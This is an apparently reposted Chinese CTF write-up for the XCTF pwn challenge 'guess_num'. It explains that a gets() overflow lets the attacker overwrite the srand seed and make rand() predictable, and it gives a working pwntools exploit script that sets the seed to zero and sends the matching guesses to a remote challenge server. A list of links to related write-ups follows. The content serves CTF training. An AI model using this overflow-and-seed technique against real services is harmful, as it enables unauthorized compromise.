guess_num(xctf)

程序员文章站 2022-05-15 20:18:21

...

0x0 程序保护和流程

保护：

流程：

main()

sub_C3E()

如果程序能成功运行到最后就能获得flag

0x1 利用过程

由于程序保护的比较全面，因此不能通过gets()进行栈溢出，所以只能通过模仿程序流程来解决问题。查阅资料得知srand(seed)会根据seed的数值改变rand()函数产生的随机数，也就是说相同种子生成的随机数是相同的。刚好gets()函数可以修改seed[0]的数值。

0x2 exp

from pwn import *
from ctypes import *				#调用srand()
#sh=process('./a')
sh=remote('124.126.19.106','39698')
libc=cdll.LoadLibrary('libc.so.6')	#加载函数
libc.srand(0)						#设置seed[0]的值
sh.recv()
payload='a'*0x20+p64(0)				#修改seed[0]的值
sh.sendline(payload)
for i in range(10):
    sh.recv()
    sh.sendline(str(libc.rand()%6+1))

sh.interactive()

guess_num(xctf)

0x0 程序保护和流程

0x1 利用过程

0x2 exp

level2 [XCTF-PWN]CTF writeup系列6

(wp)攻防世界PWN——guess_num

XCTF新手区Crypto writeup

cgpwn2 [XCTF-PWN]CTF writeup系列10

Noleak(xctf)

easyfmt(xctf)

echo_back(xctf)

【XCTF 攻防世界】WEB 高手进阶区 supersqli(三种方法)

greeting-150(xctf)

secret_file(xctf)